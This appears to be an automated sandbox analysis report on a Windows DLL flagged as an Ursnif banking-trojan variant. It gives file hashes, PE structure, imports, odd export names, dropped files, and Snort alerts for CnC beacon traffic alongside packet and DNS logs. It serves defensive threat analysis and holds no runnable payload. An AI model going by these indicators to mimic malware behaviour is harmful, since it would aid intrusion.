C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.121867956514355
Encrypted:	false
SSDEEP:	12:TMHdNMNxfn8AeZ7AeZAnWimI002EtM3MHdNMNxfn8AeZ7AeZAnWimI00Obe5EtMb:2d6NxElqSZHKd6NxElqSZ7ijb
MD5:	9A27A88CF938E3C4E0CC0269958A1E58
SHA1:	4D9817EE61624324D4C4B12F44DADC56A0A4C22C
SHA-256:	1AF855867CF3E2A780A6A0446CF441CA6C38DFC5618E08F53A95BF3BDA43E5DC
SHA-512:	84FF9935B33C728DCDE14016A22DB8EABA513D26609A6D3BB865B5388DF4C463750A396A39AA996A17CB2F5ED3B60043C2926F5873E919A3E6B532A3004E8EB8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	89
Entropy (8bit):	4.45974266689267
Encrypted:	false
SSDEEP:	3:oVXUTXWQXIqAW8JOGXnETXWQXINCn:o9UbWQj9qEbWQx
MD5:	31F3A28E3C9E0448A4DE020E1CFCE108
SHA1:	7973A0BA483BCDC71D6B4019EED8E339FDD3A4A2
SHA-256:	B996A2D4F7C4BFE8D9768D73D98F5ADBF990DFD46F31592BC98456A97861E47B
SHA-512:	7382AF998560B796D3F4C852AAF037943DE1A7CF13B377A73931DA0318CEE03CA295F950BD7181F66402B667D96651D9B7DA61556C902D6768DD0D68259862D6
Malicious:	false
Preview:	[2021/07/09 15:24:32.452] Latest deploy version: ..[2021/07/09 15:24:32.452] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF07D76F7116EA20F8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39673
Entropy (8bit):	0.5785657953581591
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+djBgDtqQF/9DqQF/9LqQF/9Q:kBqoxKAuqR+djBgDtqCFDqCFLqCFQ
MD5:	43C08021A5463B6D50E11C9B0BAA362B
SHA1:	EDB06BDF34E9CB9AA26AE49B9C86E4CAE07C455D
SHA-256:	1E0EBF8E779D2B155A35E19C0E03DF9BD10B71AF760681FD2EF7B7423CF1F67C
SHA-512:	739BA552A407DF3BE4136C6180ADCC94474DEFCAAEAF689439B218C03F8E6FC00ABD733CA5B80160AC036E3B68D7EC62DA83B91B48FE6BE36119BF8A4565D0F0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD1208600E5902E85.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4077520377433156
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lofF9lo99lWBKZuZ5:kBqoIGY0C5
MD5:	CF36976683EF379314E18BCFA7B64F2B
SHA1:	63F70513C6EE4995434753552B1C08602CA2145E
SHA-256:	7194824FCFF90202061DE09AE7017A032227DAC4FA8EDD025BF60BD0B18CAB48
SHA-512:	6EE26E39E72414E447954280B7F418CAB1C9FAB75D7F2254EB5753FA3B4703CED4BFD2F254811B0B72F866800D021EC4C7A43C4CFD9A30CDB269ED402B8BF28A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.699066149824432
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	c36.dll
File size:	421376
MD5:	c36ab737db2b6d11fb1f443f8117a7fa
SHA1:	e6fab2798dd6088aa3527a01ae1b3f2415cf40cf
SHA256:	181fe6714ebaff8c1855e8e1dbac545ffd160df0ec96ddf920c5155916b7111b
SHA512:	04884ebda245977509b16eddc89a057582f47cc315610ba040750313bdb668d5377fec118f9c6d7934c7369c3b40d09cb084ec22c71979316ed32860538b0fa9
SSDEEP:	6144:XoiHyepaXa+Cv3FyUtySzhyq++rWM+AVF7tct2PytUDlrfu+U39O:YfGFvFu8hPwM+AVLcMKtKtK
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./"j.kC..kC..kC..u...sC..u....C..b;..lC..kC...C..u...RC..u...jC..u...jC..u...jC..RichkC..................PE..L.....+L...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1036ead
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x4C2B8293 [Wed Jun 30 17:44:51 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	9ac2df5a14a0377b217ae274fd22ed43

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FF678D92B27h
call 00007FF678D9E142h
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007FF678D92A11h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov eax, dword ptr [01062480h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
test byte ptr [01062500h], 00000001h
push esi
je 00007FF678D92B2Ah
push 0000000Ah
call 00007FF678D98B9Ah
pop ecx
call 00007FF678D9E1EEh
test eax, eax
je 00007FF678D92B2Ah
push 00000016h
call 00007FF678D9E1F0h
pop ecx
test byte ptr [01062500h], 00000002h
je 00007FF678D92BF0h
mov dword ptr [ebp-00000220h], eax
mov dword ptr [ebp-00000224h], ecx
mov dword ptr [ebp-00000228h], edx
mov dword ptr [ebp-0000022Ch], ebx
mov dword ptr [ebp-00000230h], esi
mov dword ptr [ebp-00000234h], edi
mov word ptr [ebp-00000208h], ss
mov word ptr [ebp-00000214h], cs
mov word ptr [ebp-00000238h], ds
mov word ptr [ebp-0000023Ch], es
mov word ptr [ebp-00000240h], fs
mov word ptr [ebp-00000244h], gs
pushfd
pop dword ptr [ebp-00000210h]
mov esi, dword ptr [ebp+04h]
lea eax, dword ptr [ebp+04h]
mov dword ptr [ebp+00FFFDF4h], eax

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[ASM] VS2008 build 21022
[LNK] VS2008 build 21022
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[IMP] VS2008 SP1 build 30729
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x619e0	0x85	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61014	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfc000	0xd80	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfd000	0x2768	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4b220	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5f700	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4b000	0x1ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x49dbd	0x49e00	False	0.661458333333	data	6.64292711487	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x4b000	0x16a65	0x16c00	False	0.650519402473	data	6.09504929451	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x62000	0x998c8	0x1800	False	0.343587239583	data	3.99466653624	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xfc000	0xd80	0xe00	False	0.364397321429	data	3.40694082872	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfd000	0x3928	0x3a00	False	0.554485452586	data	5.40101717847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0xfc250	0xce	data	English	United States
RT_DIALOG	0xfc320	0x112	data	English	United States
RT_DIALOG	0xfc438	0x13a	data	English	United States
RT_DIALOG	0xfc578	0xf2	data	English	United States
RT_DIALOG	0xfc670	0x11a	data	English	United States
RT_DIALOG	0xfc790	0xf0	data	English	United States
RT_DIALOG	0xfc880	0xf8	data	English	United States
RT_DIALOG	0xfc978	0xca	data	English	United States
RT_DIALOG	0xfca48	0xea	data	English	United States
RT_DIALOG	0xfcb38	0xc8	data	English	United States
RT_MANIFEST	0xfcc00	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateProcessA, GetStartupInfoA, CopyFileA, DeleteFileA, CloseHandle, GetTickCount, Sleep, GetCurrentThreadId, GetProcAddress, LoadLibraryA, VirtualProtectEx, GetEnvironmentVariableA, GetTempPathA, GetWindowsDirectoryA, SetConsoleCP, SetConsoleOutputCP, GetCurrentDirectoryA, CompareStringW, CompareStringA, CreateFileA, GetLocaleInfoW, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, InitializeCriticalSectionAndSpinCount, SetFilePointer, ReadFile, FlushFileBuffers, GetConsoleMode, GetConsoleCP, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, InterlockedExchange, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, MultiByteToWideChar, GetSystemTimeAsFileTime, HeapAlloc, RtlUnwind, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCommandLineA, GetLastError, HeapFree, GetCPInfo, LCMapStringA, LCMapStringW, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetTimeZoneInformation, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, HeapDestroy, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, GetStringTypeW, GetModuleHandleA, SetHandleCount, GetFileType, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetCurrentProcessId, HeapSize, SetEnvironmentVariableA
USER32.dll	GetClientRect, GetDesktopWindow, CreateDialogIndirectParamA, GetForegroundWindow, GetWindowRect, DialogBoxIndirectParamA, CreatePopupMenu, GetSysColorBrush, DispatchMessageA
ole32.dll	CoTaskMemFree, CoTaskMemAlloc, CoInitialize, CoUninitialize

Exports

Name	Ordinal	Address
Beautyresult	1	0x102c990
Division	2	0x102da30
Fastcolor	3	0x102d940
Yetclose	4	0x102dcb0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/09/21-15:24:33.634449	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49729	80	192.168.2.3	40.97.128.194
07/09/21-15:24:33.634449	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49729	80	192.168.2.3	40.97.128.194

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 9, 2021 15:24:33.507741928 CEST	49729	80	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:33.508086920 CEST	49730	80	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:33.633079052 CEST	80	49729	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:33.633184910 CEST	49729	80	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:33.634449005 CEST	49729	80	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:33.636660099 CEST	80	49730	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:33.636779070 CEST	49730	80	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:33.761584997 CEST	80	49729	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:33.761776924 CEST	49729	80	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:33.762681961 CEST	49729	80	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:33.786556005 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:33.886631966 CEST	80	49729	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:33.915479898 CEST	443	49731	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:33.915713072 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:33.929497004 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:34.060129881 CEST	443	49731	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:34.060195923 CEST	443	49731	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:34.060220003 CEST	443	49731	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:34.060425997 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:34.060448885 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:34.113426924 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:34.117860079 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:34.243573904 CEST	443	49731	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:34.243865013 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:34.248527050 CEST	443	49731	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:34.252892971 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:34.252932072 CEST	49731	443	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:34.303044081 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.303044081 CEST	49733	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.315371037 CEST	443	49733	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.315510035 CEST	443	49732	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.315514088 CEST	49733	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.315687895 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.316931009 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.317018986 CEST	49733	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.330826998 CEST	443	49733	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.330893040 CEST	443	49732	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.330934048 CEST	443	49732	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.330981016 CEST	443	49732	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.331026077 CEST	443	49733	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.331043959 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.331063032 CEST	443	49733	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.331074953 CEST	49733	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.331132889 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.331195116 CEST	49733	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.341037989 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.350852966 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.351823092 CEST	49733	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.354607105 CEST	443	49732	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.354799986 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.365852118 CEST	443	49733	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.366991997 CEST	443	49732	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.367846966 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.367846966 CEST	49733	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.368366957 CEST	49732	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:34.381774902 CEST	443	49731	40.97.128.194	192.168.2.3
Jul 9, 2021 15:24:34.382589102 CEST	443	49732	52.98.163.18	192.168.2.3
Jul 9, 2021 15:24:34.413362980 CEST	49734	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.413582087 CEST	49735	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.425853968 CEST	443	49735	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.425878048 CEST	443	49734	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.427479029 CEST	49735	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.427491903 CEST	49735	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.427607059 CEST	49734	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.429343939 CEST	49734	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.441689014 CEST	443	49735	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.441715956 CEST	443	49735	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.441732883 CEST	443	49735	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.442029953 CEST	49735	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.443164110 CEST	443	49734	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.443254948 CEST	443	49734	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.444747925 CEST	443	49734	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.444757938 CEST	49734	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.444782019 CEST	49734	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.447962046 CEST	49734	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.452936888 CEST	49735	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.454736948 CEST	49735	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.456970930 CEST	49734	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.467066050 CEST	443	49735	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.467705965 CEST	443	49735	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.468261003 CEST	49735	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.470284939 CEST	443	49734	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.470416069 CEST	49734	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:34.480480909 CEST	443	49735	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.480509043 CEST	443	49735	52.97.201.194	192.168.2.3
Jul 9, 2021 15:24:34.481842041 CEST	49735	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:35.952073097 CEST	49730	80	192.168.2.3	40.97.128.194
Jul 9, 2021 15:24:35.952291965 CEST	49733	443	192.168.2.3	52.98.163.18
Jul 9, 2021 15:24:35.952323914 CEST	49734	443	192.168.2.3	52.97.201.194
Jul 9, 2021 15:24:35.953020096 CEST	49735	443	192.168.2.3	52.97.201.194

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 9, 2021 15:23:02.737814903 CEST	57544	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:02.751353025 CEST	53	57544	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:03.688863993 CEST	55984	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:03.702208996 CEST	53	55984	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:04.216675997 CEST	64185	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:04.237498045 CEST	53	64185	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:04.677397013 CEST	65110	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:04.691787958 CEST	53	65110	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:05.325028896 CEST	58361	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:05.338064909 CEST	53	58361	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:06.326881886 CEST	63492	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:06.340981007 CEST	53	63492	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:07.086497068 CEST	60831	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:07.099680901 CEST	53	60831	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:08.259793043 CEST	60100	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:08.272742033 CEST	53	60100	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:09.378868103 CEST	53195	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:09.392980099 CEST	53	53195	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:10.391124964 CEST	50141	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:10.407327890 CEST	53	50141	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:11.215621948 CEST	53023	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:11.236013889 CEST	53	53023	8.8.8.8	192.168.2.3
Jul 9, 2021 15:23:52.467493057 CEST	49563	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:23:52.515966892 CEST	53	49563	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:06.116390944 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:06.129160881 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:06.942337036 CEST	59349	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:06.955936909 CEST	53	59349	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:07.828459978 CEST	57084	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:07.855434895 CEST	53	57084	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:08.206068039 CEST	58823	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:08.221400976 CEST	53	58823	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:08.921717882 CEST	57568	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:08.934693098 CEST	53	57568	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:10.140501976 CEST	50540	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:10.154294014 CEST	53	50540	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:11.484508991 CEST	54366	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:11.497576952 CEST	53	54366	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:13.144767046 CEST	53034	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:13.157658100 CEST	53	53034	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:29.787411928 CEST	57762	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:29.807204008 CEST	53	57762	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:33.469208956 CEST	55435	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:33.482678890 CEST	53	55435	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:34.285837889 CEST	50713	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:34.300118923 CEST	53	50713	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:34.386554956 CEST	56132	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:34.399265051 CEST	53	56132	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:50.065752029 CEST	58987	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:50.079216003 CEST	53	58987	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:55.995177031 CEST	56579	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:56.008249044 CEST	53	56579	8.8.8.8	192.168.2.3
Jul 9, 2021 15:24:59.628042936 CEST	60633	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:24:59.641279936 CEST	53	60633	8.8.8.8	192.168.2.3
Jul 9, 2021 15:25:00.639893055 CEST	60633	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:25:00.655927896 CEST	53	60633	8.8.8.8	192.168.2.3
Jul 9, 2021 15:25:01.687092066 CEST	60633	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:25:01.701251030 CEST	53	60633	8.8.8.8	192.168.2.3
Jul 9, 2021 15:25:03.690778017 CEST	60633	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:25:03.707277060 CEST	53	60633	8.8.8.8	192.168.2.3
Jul 9, 2021 15:25:04.373759985 CEST	61292	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:25:04.393018961 CEST	53	61292	8.8.8.8	192.168.2.3
Jul 9, 2021 15:25:07.742360115 CEST	60633	53	192.168.2.3	8.8.8.8
Jul 9, 2021 15:25:07.757781982 CEST	53	60633	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 9, 2021 15:24:33.469208956 CEST	192.168.2.3	8.8.8.8	0x6450	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.285837889 CEST	192.168.2.3	8.8.8.8	0xcc0b	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.386554956 CEST	192.168.2.3	8.8.8.8	0xa524	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 9, 2021 15:24:33.482678890 CEST	8.8.8.8	192.168.2.3	0x6450	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST	8.8.8.8	192.168.2.3	0x6450	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST	8.8.8.8	192.168.2.3	0x6450	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST	8.8.8.8	192.168.2.3	0x6450	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST	8.8.8.8	192.168.2.3	0x6450	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST	8.8.8.8	192.168.2.3	0x6450	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST	8.8.8.8	192.168.2.3	0x6450	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST	8.8.8.8	192.168.2.3	0x6450	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST	8.8.8.8	192.168.2.3	0xcc0b	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
